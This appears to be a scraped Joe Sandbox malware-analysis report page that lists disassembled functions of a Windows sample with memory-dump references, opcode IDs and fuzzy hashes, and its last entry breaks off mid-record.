                                                        • Snapshot File: hcaresult_0_2_7ff702020000_deb.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: ecbf08d9664d412c8ec0758d68f897dbf2a51a456065063f6061e747ae2da0b3
                                                        • Instruction ID: 567aa87872ed9e63455a9408dd84c8456fa2e88aaa046c3e69a40cccd03baf82
                                                        • Opcode Fuzzy Hash: ecbf08d9664d412c8ec0758d68f897dbf2a51a456065063f6061e747ae2da0b3
                                                        • Instruction Fuzzy Hash: B4A28023A0C7C585E774EA29D84037ABBA0FB85B88F908135DA8D43B94DFBDD494CB54
                                                        Function 00007FF70207C4B0 Relevance: .9, Instructions: 949COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2268389362.00007FF702021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF702020000, based on PE: true
                                                        • Associated: 00000000.00000002.2268371716.00007FF702020000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2268478141.00007FF7020EB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2268499359.00007FF7020EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2268538812.00007FF70211C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2268560319.00007FF70211E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2268581032.00007FF702121000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7ff702020000_deb.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 58b48ee7cea797f0e3081119ea92f1713ae9835a78e681791f0d82329b4de3af
                                                        • Instruction ID: 60ad3eae2216d96bd794af1a9e0a466e9cb0534652bc56b6734256c13fd2872a
                                                        • Opcode Fuzzy Hash: 58b48ee7cea797f0e3081119ea92f1713ae9835a78e681791f0d82329b4de3af
                                                        • Instruction Fuzzy Hash: EAA28123A0CB8585E774EA29D84437ABBA0FF85B84F904132DA8D03B94DFBDD495C764
                                                        Function 00007FF70207D730 Relevance: .9, Instructions: 945COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2268389362.00007FF702021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF702020000, based on PE: true
                                                        • Associated: 00000000.00000002.2268371716.00007FF702020000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2268478141.00007FF7020EB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2268499359.00007FF7020EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2268538812.00007FF70211C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2268560319.00007FF70211E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2268581032.00007FF702121000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7ff702020000_deb.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: a95dab607c5c34c492b8b2988a68b53cba2b29aca9de85aa3c52503940b14b2f
                                                        • Instruction ID: 5a2c853f5abf57e062d5248f858e9b277c26ce1d8c445289aa53f32b00e08d5d
                                                        • Opcode Fuzzy Hash: a95dab607c5c34c492b8b2988a68b53cba2b29aca9de85aa3c52503940b14b2f
                                                        • Instruction Fuzzy Hash: ADA28C23A0CB8185E764EB29E84437AABA0FF85B94F904131DA8D03BD9DFBCD455CB54
                                                        Function 00007FF70207E990 Relevance: .9, Instructions: 931COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2268389362.00007FF702021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF702020000, based on PE: true
                                                        • Associated: 00000000.00000002.2268371716.00007FF702020000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2268478141.00007FF7020EB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2268499359.00007FF7020EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2268538812.00007FF70211C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2268560319.00007FF70211E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2268581032.00007FF702121000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7ff702020000_deb.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: c0bf2df20e0d193bf8ebc40d10b8a5ca0d755abb3ef519f560e68bd91a38392c
                                                        • Instruction ID: 4c06bcb72d2e4b64441865c9b408527070621e76ee22211c8259c36a9ce2f4d3
                                                        • Opcode Fuzzy Hash: c0bf2df20e0d193bf8ebc40d10b8a5ca0d755abb3ef519f560e68bd91a38392c
                                                        • Instruction Fuzzy Hash: 80929123A0C78685E770EB29D84437ABBA0FB85B94F904531DA8D03BA4DFBCD455CB64
                                                        Function 00007FF702084AF0 Relevance: .7, Instructions: 731COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2268389362.00007FF702021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF702020000, based on PE: true
                                                        • Associated: 00000000.00000002.2268371716.00007FF702020000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2268478141.00007FF7020EB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2268499359.00007FF7020EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2268538812.00007FF70211C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2268560319.00007FF70211E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2268581032.00007FF702121000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7ff702020000_deb.jbxd
                                                        Similarity
                                                        • API ID: memset
                                                        • String ID:
                                                        • API String ID: 2221118986-0
                                                        • Opcode ID: f923f513007de687e14f6a36c0b62c10fa21f7250a36f56340075ee1a9fa8f7d
                                                        • Instruction ID: 7105874e308e065913b2ed2b89eb38e1a3664e9aa0d4eba521ecf1010ebe552c
                                                        • Opcode Fuzzy Hash: f923f513007de687e14f6a36c0b62c10fa21f7250a36f56340075ee1a9fa8f7d
                                                        • Instruction Fuzzy Hash: 67622537608B8581D6609F65E8406AEBBB4FB88B90F904126EFCD53B68CFBCD554CB14
                                                        Function 00007FF702041870 Relevance: .6, Instructions: 634COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2268389362.00007FF702021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF702020000, based on PE: true
                                                        • Associated: 00000000.00000002.2268371716.00007FF702020000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2268478141.00007FF7020EB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2268499359.00007FF7020EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2268538812.00007FF70211C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2268560319.00007FF70211E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2268581032.00007FF702121000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7ff702020000_deb.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: cf53057c7c4b2e9777abe60d8ea96c870b2accc468f8a6cc32d0d56dee578b20
                                                        • Instruction ID: ff4b870e5ce5f84b42e79187c6f8b9a90e538f0637e08a2dbf82a7cda02bd805
                                                        • Opcode Fuzzy Hash: cf53057c7c4b2e9777abe60d8ea96c870b2accc468f8a6cc32d0d56dee578b20
                                                        • Instruction Fuzzy Hash: 3242CFB7A0878586EB609E15D80436AEBA0FF45BD4F948131EE5D43798DBFCE880C724
                                                        Function 00007FF702024900 Relevance: .5, Instructions: 491COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2268389362.00007FF702021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF702020000, based on PE: true
                                                        • Associated: 00000000.00000002.2268371716.00007FF702020000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2268478141.00007FF7020EB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2268499359.00007FF7020EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2268538812.00007FF70211C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2268560319.00007FF70211E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2268581032.00007FF702121000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7ff702020000_deb.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 20cb16a5b97a582556b18f09ed2899ade9d7ad12ac74a933e72b3b6a4594a0bf
                                                        • Instruction ID: 27dc7cacb8c7a272a86ccb656dfa4908cde6dfb9bd599bdd6cf9d54c08e90326
                                                        • Opcode Fuzzy Hash: 20cb16a5b97a582556b18f09ed2899ade9d7ad12ac74a933e72b3b6a4594a0bf
                                                        • Instruction Fuzzy Hash: 0312C153D0C38605FB69AA15EC4037ADE929F51B94FD88033CA4D077C6DFACA899C768
                                                        Function 00007FF702069790 Relevance: .4, Instructions: 352COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2268389362.00007FF702021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF702020000, based on PE: true
                                                        • Associated: 00000000.00000002.2268371716.00007FF702020000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2268478141.00007FF7020EB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2268499359.00007FF7020EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2268538812.00007FF70211C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2268560319.00007FF70211E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2268581032.00007FF702121000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7ff702020000_deb.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 11247b46210caf02a7fcbc0c93498fb8b6b36980d2c716b71bcbf6a10ad8e75c
                                                        • Instruction ID: 6892260fa7b07514a72c4999995a55bfc612484d2ea8ef8c21b7772895892d86
                                                        • Opcode Fuzzy Hash: 11247b46210caf02a7fcbc0c93498fb8b6b36980d2c716b71bcbf6a10ad8e75c
                                                        • Instruction Fuzzy Hash: 9CB1B233B08B8685E670AB15E8441AAABA1FF847D4F949131EE8D13F88DF7CD551C718
                                                        Function 00007FF702069C00 Relevance: .2, Instructions: 227COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2268389362.00007FF702021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF702020000, based on PE: true
                                                        • Associated: 00000000.00000002.2268371716.00007FF702020000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2268478141.00007FF7020EB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2268499359.00007FF7020EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2268538812.00007FF70211C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2268560319.00007FF70211E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2268581032.00007FF702121000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7ff702020000_deb.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 59e70661249d86ceb50a08995303823bb3031516eb914d1017f7b2ebf4668868
                                                        • Instruction ID: b72b6a8a31f4f80613e137b4aa49e249c03d590b3146a9be03f7a4d53790c60f
                                                        • Opcode Fuzzy Hash: 59e70661249d86ceb50a08995303823bb3031516eb914d1017f7b2ebf4668868
                                                        • Instruction Fuzzy Hash: 1971B423B0878685E670AA15E84857EABA5FF447D4F944131EE8D03F88CFBCD541C718
                                                        Function 00007FF70205C9FF Relevance: .2, Instructions: 179COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2268389362.00007FF702021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF702020000, based on PE: true
                                                        • Associated: 00000000.00000002.2268371716.00007FF702020000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2268478141.00007FF7020EB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2268499359.00007FF7020EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2268538812.00007FF70211C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2268560319.00007FF70211E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2268581032.00007FF702121000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7ff702020000_deb.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: fb495e440ad794ce6a3a15fbb1ad3f3a3b70adb389507deacf26e2957873038a
                                                        • Instruction ID: f5639fd9ecf51bae224889624c3773f35df289843882c533ae8e1d9668b5ca6b
                                                        • Opcode Fuzzy Hash: fb495e440ad794ce6a3a15fbb1ad3f3a3b70adb389507deacf26e2957873038a
                                                        • Instruction Fuzzy Hash: D871B427A097A681FA64AB25984427BAFA0FF41F48F954532DA8A033D4EFBCD940D354
                                                        Function 00007FF702035500 Relevance: .1, Instructions: 128COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2268389362.00007FF702021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF702020000, based on PE: true
                                                        • Associated: 00000000.00000002.2268371716.00007FF702020000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2268478141.00007FF7020EB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2268499359.00007FF7020EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2268538812.00007FF70211C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2268560319.00007FF70211E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2268581032.00007FF702121000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7ff702020000_deb.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 478f2f235a539d591e7021ec0d09dd2fd92d248d29de88019e58d9f3ce446777
                                                        • Instruction ID: c5b2df5016487ca274195a077506be6233a7635979ff0a056990f9d39f54690d
                                                        • Opcode Fuzzy Hash: 478f2f235a539d591e7021ec0d09dd2fd92d248d29de88019e58d9f3ce446777
                                                        • Instruction Fuzzy Hash: B241B073B192518AEA14DF26DD04AB9BFA5FB4CB84FC58035DE0983740EB78E501CB54
                                                        Function 00007FF702038E50 Relevance: .1, Instructions: 123COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2268389362.00007FF702021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF702020000, based on PE: true
                                                        • Associated: 00000000.00000002.2268371716.00007FF702020000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2268478141.00007FF7020EB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2268499359.00007FF7020EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2268538812.00007FF70211C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2268560319.00007FF70211E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2268581032.00007FF702121000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7ff702020000_deb.jbxd
                                                        Similarity
                                                        • API ID: CriticalLeaveSection
                                                        • String ID:
                                                        • API String ID: 3988221542-0
                                                        • Opcode ID: 054a5dbe9471a283ba5196163799957f6ee46336e60399a3594864f5020b762b
                                                        • Instruction ID: 8c7e1d34d4341f3a92ae5bdc3becf2c9cca24686f2c046a6400a366ce2eb61be
                                                        • Opcode Fuzzy Hash: 054a5dbe9471a283ba5196163799957f6ee46336e60399a3594864f5020b762b
                                                        • Instruction Fuzzy Hash: 7D413AB3E0C3054BE7988E19E9007293A96AB94385FA0C239EB09867C5CB7C9645CB81
                                                        Function 00007FF7020E0200 Relevance: .1, Instructions: 113COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2268389362.00007FF702021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF702020000, based on PE: true
                                                        • Associated: 00000000.00000002.2268371716.00007FF702020000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2268478141.00007FF7020EB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2268499359.00007FF7020EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2268538812.00007FF70211C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2268560319.00007FF70211E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2268581032.00007FF702121000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7ff702020000_deb.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 0c51f7afec0952b9b9e6a0bf02dbecaae69ff4687b712ac4fe285f1ff6646ed3
                                                        • Instruction ID: 520d231f37cc820efab5896fd3c238713d2bff76a50e46f0cfa2812650dce0ed
                                                        • Opcode Fuzzy Hash: 0c51f7afec0952b9b9e6a0bf02dbecaae69ff4687b712ac4fe285f1ff6646ed3
                                                        • Instruction Fuzzy Hash: 33419233B19B0A95DA61AF2DEC8007DEB64AF89BA8F944132DE4C17764DFACD441C718
                                                        Function 00007FF70204A5C0 Relevance: .1, Instructions: 106COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2268389362.00007FF702021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF702020000, based on PE: true
                                                        • Associated: 00000000.00000002.2268371716.00007FF702020000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2268478141.00007FF7020EB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2268499359.00007FF7020EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2268538812.00007FF70211C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2268560319.00007FF70211E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2268581032.00007FF702121000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7ff702020000_deb.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: c67b891ca2c26bbadcdf820169b534216a8572988469d5c03fa9d39e137cee33
                                                        • Instruction ID: 8f6fb53c46b1246fd02d2c69ea03b1cba0342230f5f58994c16fad05075274e2
                                                        • Opcode Fuzzy Hash: c67b891ca2c26bbadcdf820169b534216a8572988469d5c03fa9d39e137cee33
                                                        • Instruction Fuzzy Hash: 0A317BB3B4464249EA20AE28D824979BB61FF80B80F95C231DF5E43BC4DFADD845C714
                                                        Function 00007FF70204B580 Relevance: .0, Instructions: 37COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2268389362.00007FF702021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF702020000, based on PE: true
                                                        • Associated: 00000000.00000002.2268371716.00007FF702020000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2268478141.00007FF7020EB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2268499359.00007FF7020EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2268538812.00007FF70211C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2268560319.00007FF70211E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2268581032.00007FF702121000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7ff702020000_deb.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: ba7abcc66e1dd8955c761d1083825da22062689680acf83a5c55ef79795df686
                                                        • Instruction ID: 275ff843fe56c2841802c3795bc79f4de2dec3f537e9e9b5209422a2fc546abc
                                                        • Opcode Fuzzy Hash: ba7abcc66e1dd8955c761d1083825da22062689680acf83a5c55ef79795df686
                                                        • Instruction Fuzzy Hash: BDF06DB7A19B5484CA209F29E84002AFBA4EB98BD4B94D131EE8D17718CE7CC440C704
                                                        Function 00007FF7020460F9 Relevance: .0, Instructions: 25COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2268389362.00007FF702021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF702020000, based on PE: true
                                                        • Associated: 00000000.00000002.2268371716.00007FF702020000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2268478141.00007FF7020EB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2268499359.00007FF7020EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2268538812.00007FF70211C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2268560319.00007FF70211E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2268581032.00007FF702121000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7ff702020000_deb.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 9b895f85038d2e52f07d4faa058f637ce858a8665ed91e642d93cf7c7ad117aa
                                                        • Instruction ID: 5d397922dddc5941ece6596b11f875f7266ee7363ff46297989a0e0e13001c40
                                                        • Opcode Fuzzy Hash: 9b895f85038d2e52f07d4faa058f637ce858a8665ed91e642d93cf7c7ad117aa
                                                        • Instruction Fuzzy Hash: 82F0BCBAA09B0081CA04EF46E8902387BB8FBC9F80B019566DE8D93721DF30C4A0C318
                                                        Function 00007FF70211D668 Relevance: .0, Instructions: 19COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2268538812.00007FF70211C000.00000004.00000001.01000000.00000003.sdmp, Offset: 00007FF702020000, based on PE: true
                                                        • Associated: 00000000.00000002.2268371716.00007FF702020000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2268389362.00007FF702021000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2268478141.00007FF7020EB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2268499359.00007FF7020EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2268560319.00007FF70211E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2268581032.00007FF702121000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7ff702020000_deb.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: dac1b74cd686180564b65efac18cfe795a7ec02a460ee58af6cfd809eec35464
                                                        • Instruction ID: 7a9ccb85e2b6fa6d4a2ea36a03b77e457f75f6f243c0d26b6c42d03dbdcf782d
                                                        • Opcode Fuzzy Hash: dac1b74cd686180564b65efac18cfe795a7ec02a460ee58af6cfd809eec35464
                                                        • Instruction Fuzzy Hash: CFE0C08BE4DAC609F16156542C6E5989FD1AE6361478E407BC74C87383EE9E1805C362
                                                        Function 00007FF702039DF9 Relevance: .0, Instructions: 4COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2268389362.00007FF702021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF702020000, based on PE: true
                                                        • Associated: 00000000.00000002.2268371716.00007FF702020000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2268478141.00007FF7020EB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2268499359.00007FF7020EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2268538812.00007FF70211C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2268560319.00007FF70211E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2268581032.00007FF702121000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7ff702020000_deb.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 277a24deee34b0824c1b8c2e611a345753b1110f570d7bb5a8526588449386fa
                                                        • Instruction ID: 36dfbd9c997d6c4d77a3971462c20b7ff581615129f990ff553c7fc42b124e2b
                                                        • Opcode Fuzzy Hash: 277a24deee34b0824c1b8c2e611a345753b1110f570d7bb5a8526588449386fa
                                                        • Instruction Fuzzy Hash: 62A0025395FD4184D2041B11FD055709A69DB07200F542031D01CE31618FBCD140C154
                                                        Function 00007FF702041180 Relevance: 26.4, APIs: 11, Strings: 4, Instructions: 116fileCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2268389362.00007FF702021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF702020000, based on PE: true
                                                        • Associated: 00000000.00000002.2268371716.00007FF702020000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2268478141.00007FF7020EB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2268499359.00007FF7020EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2268538812.00007FF70211C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2268560319.00007FF70211E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2268581032.00007FF702121000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7ff702020000_deb.jbxd
                                                        Similarity
                                                        • API ID: fwrite$fputs$free$abortfputcmemcpystrlen
                                                        • String ID: what(): $terminate called after throwing an instance of '$terminate called recursively$terminate called without an active exception
                                                        • API String ID: 360841300-808685626
                                                        • Opcode ID: aaebf5af70e80af6eb5122cb4d70a170c33787dcb1e557bfbc8777c91e7bf471
                                                        • Instruction ID: de33ad0d34634f373e8ea2c8da2795c3a05b65317bdc8417e3bebc5f83c959d7
